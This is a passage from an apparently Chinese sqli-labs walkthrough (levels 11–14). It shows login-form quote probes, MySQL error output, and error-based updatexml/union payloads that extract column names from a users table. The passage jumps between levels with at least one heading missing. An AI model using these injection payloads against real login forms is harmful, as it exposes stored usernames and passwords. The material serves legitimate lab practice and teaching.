You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’‘’ and password=‘’ LIMIT 0,1’ at line 1
存在错误返回信息,由错误信息我们可以推断该注入点存在 单引号字符型注入。
总结
由于该关卡中会提示错误信息,所以我们可以通过报错注入来爆破数据库。
符号
由于该关卡需要通过 POST 请求来提交数据,所以我们不能像前面的关卡那样在 URL 中添加数据以通过构造 URL 来提交数据,所以也就不存在与 URL 相关的问题。
' union select 1, updatexml(1, substr(concat(0x7e, (select group_concat(column_name) from information_schema.columns where table_name = 'users'),0x7e),16,32),1)#
返回结果:
XPATH syntax error: ‘,TOTAL_CONNECTIONS,id,’
第二次偏移
请在 username 输入框中输入如下内容并点击 Submit。
' union select 1, updatexml(1, substr(concat(0x7e, (select group_concat(column_name) from information_schema.columns where table_name = 'users'),0x7e),32,32),1)#
返回结果:
XPATH syntax error: ‘,id,username,passwor’
第三次偏移
请在 username 输入框中输入如下内容并点击 Submit。
' union select 1, updatexml(1, substr(concat(0x7e, (select group_concat(column_name) from information_schema.columns where table_name = 'users'),0x7e),48,32),1)#
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘“”“) and password=(””) LIMIT 0,1’ at line 1
该关卡仅在闭合方式上与第十一关有所区别。在这一关中,我们需要正确闭合 (“。
第十三关
请在 username 输入框中输入如下内容并点击 Submit。
'
返回结果:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’‘’) and password=(‘’) LIMIT 0,1’ at line 1
该关卡仅在闭合方式上与第十一关有所区别。在这一关中,我们需要正确闭合 (‘。
第十四关
请在 username 输入框中输入如下内容并点击 Submit。
"
返回结果:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘“”” and password=“” LIMIT 0,1’ at line 1